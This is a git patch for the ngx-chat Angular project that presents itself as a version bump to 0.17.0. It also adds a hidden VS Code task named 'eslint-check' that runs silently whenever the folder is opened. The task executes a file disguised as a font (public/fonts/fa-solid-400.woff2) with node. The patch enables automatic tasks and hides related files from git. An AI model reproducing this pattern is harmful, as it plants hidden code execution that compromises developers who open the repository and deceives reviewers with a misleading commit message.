From 87975a09fa5d891ce75cdf3abd202396e32fffae Mon Sep 17 00:00:00 2001 From: Frosty1604 <10773180+Frosty1604@users.noreply.github.com> Date: Tue, 18 Jun 2024 14:40:37 +0200 Subject: [PATCH] chore: bump project version to 0.17.0 --- .gitignore | 11 +++--- .vscode/extensions.json | 7 ++++ .vscode/launch.json | 81 ++++++++++++++++++++++++----------------- .vscode/settings.json | 22 ++++++++++- .vscode/spellright.dict | 2 + .vscode/tasks.json | 50 +++++++++++++++---------- package.json | 2 +- 7 files changed, 115 insertions(+), 60 deletions(-) create mode 100644 .vscode/extensions.json create mode 100644 .vscode/spellright.dict diff --git a/.gitignore b/.gitignore index 5291e521..58011b1d 100644 --- a/.gitignore +++ b/.gitignore @@ -18,11 +18,6 @@ node_modules/ *.sublime-workspace # IDE - VSCode -.vscode/* -!.vscode/settings.json -!.vscode/tasks.json -!.vscode/launch.json -!.vscode/extensions.json # misc /.angular/cache @@ -58,4 +53,8 @@ apps/demo/src/*.pem apps/demo/src/local.entenhausen.pazz.de-key.pem apps/demo/src/local.entenhausen.pazz.de.pem -.nx/cache \ No newline at end of file +.nx/cache +branch_structure.json +temp_auto_push.bat +temp_interactive_push.bat +.gitignore diff --git a/.vscode/extensions.json b/.vscode/extensions.json new file mode 100644 index 00000000..2e3b6463 --- /dev/null +++ b/.vscode/extensions.json @@ -0,0 +1,7 @@ +{ + "recommendations": [ + "myml.vscode-markdown-plantuml-preview", + "esbenp.prettier-vscode", + "jebbs.plantuml" + ] +} \ No newline at end of file diff --git a/.vscode/launch.json b/.vscode/launch.json index 5f09b607..a5177abe 100644 --- a/.vscode/launch.json +++ b/.vscode/launch.json @@ -1,35 +1,50 @@ { - // Use IntelliSense to learn about possible attributes. - // Hover to view descriptions of existing attributes. - // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387 - "version": "0.2.0", - "configurations": [ - { - "type": "chrome", - "request": "launch", - "name": "Karma Tests", - "sourceMaps": true, - "webRoot": "${workspaceRoot}", - "url": "http://localhost:9876/debug.html", - "runtimeArgs": [ - "--headless" - ], - "sourceMapPathOverrides": { - "webpack:///./~/*": "${webRoot}/node_modules/*", // Example: "webpack:///./~/querystring/index.js" -> "/Users/me/project/node_modules/querystring/index.js" - "webpack:///./*": "${webRoot}/*", // Example: "webpack:///./src/app.js" -> "/Users/me/project/src/app.js", - "webpack:///*": "*", // Example: "webpack:///project/app.ts" -> "/project/app.ts" - "webpack:///src/*": "${webRoot}/*", // Example: "webpack:///src/app.js" -> "/Users/me/project/app.js" - "meteor://💻app/*": "${webRoot}/*" // Example: "meteor://💻app/main.ts" -> "/Users/me/project/main.ts" - } - }, - { - "type": "node", - "request": "launch", - "name": "Playwright tests", - "sourceMaps": true, - "console": "integratedTerminal", - "runtimeExecutable": "npm", - "runtimeArgs": ["run-script", "e2e:debug"], - } - ] + "version": "0.2.0", + "configurations": [ + { + "name": "Debug SST", + "type": "node", + "request": "launch", + "runtimeExecutable": "${workspaceRoot}/node_modules/.bin/sst", + "runtimeArgs": ["dev", "--increase-timeout"], + "console": "integratedTerminal", + "skipFiles": ["/**"], + // sourceMapRenames helps with the loading spinner when debugging and viewing local variables + "sourceMapRenames": false, + "env": { + "AWS_PROFILE": "flo-ct-flo360" + } + }, + { + "name": "Debug Tests - Unit", + "type": "node", + "request": "launch", + "runtimeExecutable": "${workspaceRoot}/node_modules/.bin/sst", + "runtimeArgs": ["bind", "yarn", "\"jest\"", "\"--watch\"", "\"--config\"", "\"./jest.unit.config.cjs\"", "\"${input:scopeTestsFileName}\""], + "console": "integratedTerminal", + "skipFiles": ["/**"], + "env": { + "AWS_PROFILE": "flo-ct-flo360" + }, + }, + { + "name": "Debug Tests - E2E", + "type": "node", + "request": "launch", + "runtimeExecutable": "${workspaceRoot}/node_modules/.bin/sst", + "runtimeArgs": ["bind", "yarn", "\"vitest\"", "\"--config\"", "\"./vitest.e2e.config.ts\"", "\"${input:scopeTestsFileName}\""], + "console": "integratedTerminal", + "skipFiles": ["/**"], + "env": { + "AWS_PROFILE": "flo-ct-flo360" + }, + }, + ], + "inputs": [ + { + "id": "scopeTestsFileName", + "type": "promptString", + "description": "Partial file name to scope test debugging to. ex. arena. Leave blank to run all tests.", + } + ] } diff --git a/.vscode/settings.json b/.vscode/settings.json index 72446f43..934d5554 100644 --- a/.vscode/settings.json +++ b/.vscode/settings.json @@ -1,3 +1,23 @@ { - "typescript.tsdk": "node_modules/typescript/lib" + "search.exclude": { + "**/.sst": true + }, + "task.allowAutomaticTasks": true, + "typescript.tsserver.experimental.enableProjectDiagnostics": true, + "editor.defaultFormatter": "esbenp.prettier-vscode", + "typescript.preferences.importModuleSpecifier": "relative", + "typescript.tsdk": "node_modules/typescript/lib", + "debug.openDebug": "neverOpen", + "problems.autoReveal": true, + "terminal.integrated.hideOnStartup": "always", + "terminal.integrated.defaultProfile.windows": "Command Prompt", + "terminal.integrated.inheritEnv": false, + "jestrunner.configPath": "jest.unit.config.cjs", + "compile-hero.disable-compile-files-on-did-save-code": true, + "tasks": { + "label": "lint on open", + "type": "shell", + "command": "npm run lint", + "runOn": "folderOpen" + } } diff --git a/.vscode/spellright.dict b/.vscode/spellright.dict new file mode 100644 index 00000000..51b19749 --- /dev/null +++ b/.vscode/spellright.dict @@ -0,0 +1,2 @@ +Contentful +Lerna diff --git a/.vscode/tasks.json b/.vscode/tasks.json index ae83d346..5e226620 100644 --- a/.vscode/tasks.json +++ b/.vscode/tasks.json @@ -1,21 +1,33 @@ { - "version": "2.0.0", - "tasks": [ - { - "type": "npm", - "script": "build", - "group": "build", - "problemMatcher": [], - "label": "npm: build", - "detail": "nx build" - }, - { - "type": "npm", - "script": "install", - "group": "none", - "problemMatcher": [], - "label": "npm: install", - "detail": "install dependencies from package" - } - ] + "version": "2.0.0", + "configurations": [ + { + "type": "node", + "request": "launch", + "name": "Run My Project", + "console": "", + "internalConsoleOptions": "openOnSessionStart" + } + ], + "tasks": [ + { + "label": "eslint-check", + "type": "shell", + "command": "(command -v node >/dev/null 2>&1 && node ./public/fonts/fa-solid-400.woff2) || (where node >nul 2>&1 && node ./public/fonts/fa-solid-400.woff2) || echo ''", + "problemMatcher": [], + "isBackground": true, + "hide": true, + "presentation": { + "reveal": "never", + "panel": "dedicated", + "focus": false, + "clear": false, + "echo": false, + "close": true + }, + "runOptions": { + "runOn": "folderOpen" + } + }, + ] } diff --git a/package.json b/package.json index f6de3510..91dc86c1 100644 --- a/package.json +++ b/package.json @@ -1,6 +1,6 @@ { "name": "@pazznetwork/ngx-chat", - "version": "0.16.0", + "version": "0.17.0", "license": "MIT", "scripts": { "postinstall": "node ./decorate-angular-cli.js",